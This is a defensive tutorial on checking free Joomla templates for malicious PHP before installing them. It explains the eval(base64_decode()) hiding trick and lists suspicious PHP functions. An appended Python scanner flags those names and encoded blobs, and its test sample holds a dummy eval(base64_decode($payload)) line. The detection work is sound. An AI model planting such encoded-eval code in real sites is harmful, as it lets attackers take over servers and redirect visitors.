Scrutinize Free Joomla Templates Carefully

This article teaches novices how to check a Joomla template for malicious PHP code before installing it. Written back when I was focused on Joomla, this advice applies to any system similar to Joomla's templates, which lets you add executable, server-side code much too mindlessly.

Pro bono design, or Trojan horse? Joomla templates are PHP code, so be careful. Free Joomla templates can hack your site.

Some hacks target vulnerable technology. Other hacks target vulnerable behavior. This article deals with the latter. The less often we do those things which might result in our sites being hacked, the safer we'll be. In the case of free Joomla templates made by evildoers, the behavior in question is this: let's stop doing the hackers' jobs for them.

I'm about to teach you how to do security checks on Joomla templates. If you follow the steps in this article before installing new templates to Joomla, you'll have an advantage against people who hack sites passively through malicious freebies, a.k.a. that classic intrusion method, the Trojan horse. Let me show you something.

This is a base64-encoded version of my site's (old) favicon:

AAABAAEAEBAAAAEACABoBQAAFgAAACgAAAAQAAAAIAAAAAEACAAAAAAAAAEAAAAAAAAAAAAAAAEAAAAAAAAfZZIAPqeDAB89NAAzn9kALB5LACogSQA5U3AAGhIoAEFTUAAnd7wAGyI6AGGq4wA1SVgAIGOQACcpTQBCST0AMhhOAC4+WwBsmdAAJyE5ABgkSAAzImAAaa6bACd3uQAcIDgALC9PAGOq4gA5m9kAWXKiAE+SvQAjH0YAKhpDAE+l2AAoITcAVnqwAD9CUgAgX4oATYvWAGKKuQBIj9EAKB9IABlYjQA9OUYAKxpBAEEtSgBHRWEAKENFADUiXAA0QGwAPVxyACZJaABDQ0kAKEhgADRBTgBLS2IANSA0AGSeyQA9Ul4AHh5FAB5tuwAlJkkAJB9SACZspQAdESYAOlNiADAWQAAXEyAAIzBsABocPgAtVJgAQKh9AC8LIQAoT4kAIw4fACgfPwAkHEUAGll7AECPwAAeHj8ARoa8ACgXKwAiEi8ANl9sAFmg3QAjCyYAG0ReABt2zQAgS34AIk52ACpGVgAnFlYAOZjRAEuq4ABBXo8AFg8qACg3XgAkHj8AKlZnAC4dKwAkXaQALIzYAC0XKgAwWYgAMEpZAC5otQBWrpsAIGy7AEB9ugAnUlAAJiJSAF2FwAA5V2kANzxMAFmi1wA9R20AOE1oADdJZwAqgtMALRhWAC1GUwA0jasAI1iCAEOG1QBXndwAIB5JAERHXQBEYHgAJRVEAC9XXABVfqsARGeTACsZWwBrt7EASKG5AEhseQBMjMcAT4TKADBUZAApX6AAMF+TADZNYABdkcsALyRSAEGf1wBDfL4ATZPPAF6f3QAoHEsAJzxbACNVcgA1UVwAKFSSACsQJgBQj88AR3C/AB4XIwA6WGgAGSNXACMOHgA8U2AAKh42AHKo4QAzXZAAN01bACmIVAA0ZnMALCxJAFCppAAiT5MAVqjZACw3ZAAulWAAFBUqABkmSgAvY50AcqzeADVvewAjMVsAPGKxADthbQBYq+IAO1VtAE2q4QAhESAAIhVaAEVHYwBcndIAHyFDADefdwBPl9kARaaMACqK1QAuUFYALGiyABhWoQAdJVIAIRUdADeaywBMrJAAKWxOAChYrgAkFUUAL425AP/ZwwA4GUIAKpJdADp2ywAsXMAAW6jSAF+U1gA1T14AQkBhACxUXwA2LEQAJEl1AEZ8wAAgGDEAOWOYAC0xagA0LGcAcqzjADNNbQA9LkgAFx5NABdoqAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAyza5OZy1bw8z03AIo4Ziy8uflndhidR+gZpzLqWzm8vLQAxnNMAGHCJujFmwgD/Lyy19IzUqcl3XEjFS0jdHy8septUs3nSiso04sVFlxMvLWkt/BRlml88luh08UELLy7hKoE5frkhFiJmHgphJy8uDuwpEqsHIY5LO0SbYnsvLFT18ydYJesJ7vVOhMFTLy0OtOt9XKYqoJ2hrqYsHy8vawxSdWEx5PpGQT9DZrMvL220oEDIAF1sgGtyv3V7Lyy8EQWCUDWq/j7QLcRG3y8uOdpMrDiQ7dRu2XE1sAsvLzB8hGBNV4FZkA8WVx6TLy7xGAb7Gaad4yoWEFqvNywAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=

If you threw that (prefixed with "data:image/x-icon;base64," including the comma) into the src attribute of an HTML img tag, you'd see my tiny head.

Now, here's something else entirely:

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

If you threw the above into a PHP base64_decode() function, and put the output of that into a PHP eval() function, then all human visitors to your site would be redirected to some nefarious evildoer's website. Search engines wouldn't notice a change. Your site would be hacked.

That's nothing. If they can run code on your site, they may as well install a rootkit, for total control.

Why the hacking lesson? The reason is simple: your Joomla template is PHP code, and as such, it's a perfect vector for hackers. Someone's always searching for a free Joomla template, so if some jerk with both design skill and coding skill makes a short-term effort to heavily market a good-looking template with evil code inside, it's just a matter of time before he gets his hooks into someone's site.

The reason he'll be successful is because people don't scrutinize template code before they install it. Here's how to look for suspicious code in a Joomla template:

  1. Download the template; it can't hurt anything unless it's installed in Joomla.
  2. Open the template's installable zip file from your Downloads folder.
  3. Browse through it folder by folder, looking for files ending in .php, and open each one.
  4. Look for blocks of encoded content, like the examples above.
  5. Look for uses of the PHP features listed below; if any of them appear, question why.

The following PHP features frequently appear in malicious code. While each has legitimate uses, they aren't relevant to templates, and could be signs of a hack: base64_decode, eval, curl_setopt, curl_setopt_array, curl_init, curl_exec, fopen, display_errors, error_reporting, ini_set, and ini_get.
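The manual review above (steps 2 through 5: open the zip, find every .php file, look for encoded blobs and for the listed PHP features) and the base64_decode()/eval() pattern shown earlier can both be checked with a small script. The following is an added example, not code from the original article: a Python scanner that walks a template zip without installing anything, flags long base64-looking runs and the article's list of suspicious PHP names, and reports the file and line so you can go look and "question why". The sample zip it builds (a clean index.php, a helper with an eval(base64_decode(...)) line, and a stylesheet) is constructed here for demonstration; the file names and the 100-character blob threshold are my assumptions, not anything from a real template.

```python
import io
import re
import sys
import zipfile

# PHP functions and settings the article lists as suspicious inside a template.
SUSPICIOUS = [
    "base64_decode", "eval", "curl_setopt", "curl_setopt_array", "curl_init",
    "curl_exec", "fopen", "display_errors", "error_reporting", "ini_set", "ini_get",
]
# PHP function names are case-insensitive; \b keeps "evaluate" from matching "eval".
SUSPICIOUS_RE = re.compile(
    r"\b(" + "|".join(map(re.escape, SUSPICIOUS)) + r")\b", re.IGNORECASE
)
# A long unbroken run of base64 alphabet characters (threshold is an assumption:
# 100+ characters with optional '=' padding) is the "block of encoded content"
# the article tells you to look for.
BASE64_RE = re.compile(r"[A-Za-z0-9+/]{100,}={0,2}")


def scan_php_source(path, source):
    """Return (path, line_number, kind, detail) findings for one PHP file's text."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        for m in SUSPICIOUS_RE.finditer(line):
            findings.append((path, lineno, "function", m.group(1).lower()))
        blob = BASE64_RE.search(line)
        if blob:
            findings.append((path, lineno, "encoded-blob", len(blob.group(0))))
    return findings


def scan_template_zip(data):
    """Scan every .php file inside a template zip (given as bytes), nothing is extracted."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir() or not info.filename.lower().endswith(".php"):
                continue
            # Decode leniently: a deliberately odd encoding should not stop the scan.
            source = zf.read(info).decode("utf-8", errors="replace")
            findings.extend(scan_php_source(info.filename, source))
    return findings


def build_sample_zip():
    """Constructed sample template zip for demonstration (not a real template)."""
    clean_index = (
        "<?php\n"
        "defined('_JEXEC') or die;\n"
        "$doc = JFactory::getDocument();\n"
        "?>\n<html>...</html>\n"
    )
    # Hypothetical helper carrying the pattern from the article: a 160-character
    # base64 string fed through base64_decode() and then eval().
    suspicious_helper = (
        "<?php\n"
        "$payload = '" + ("QUJD" * 40) + "';\n"
        "eval(base64_decode($payload));\n"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("tmpl/index.php", clean_index)
        zf.writestr("tmpl/includes/helper.php", suspicious_helper)
        zf.writestr("tmpl/css/template.css", "body { margin: 0 }")
    return buf.getvalue()


def report(findings):
    """Render findings one per line, grouped as the reviewer would read them."""
    if not findings:
        return "no suspicious PHP found"
    return "\n".join(f"{p}:{n}: {kind} {detail}" for p, n, kind, detail in findings)


if __name__ == "__main__":
    # Usage: python scan_template.py template.zip   (no argument scans the built-in sample)
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_zip()
    print(report(scan_template_zip(data)))
```

A hit is a prompt to open the file, not a verdict: comments, legitimate error handling and library code will trigger the name list too, and a run of base64 can be an embedded image, as the favicon above shows. What matters is the article's question, why would a template need this? The scan only reads the zip entries, so it is safe to run on a download you have not installed.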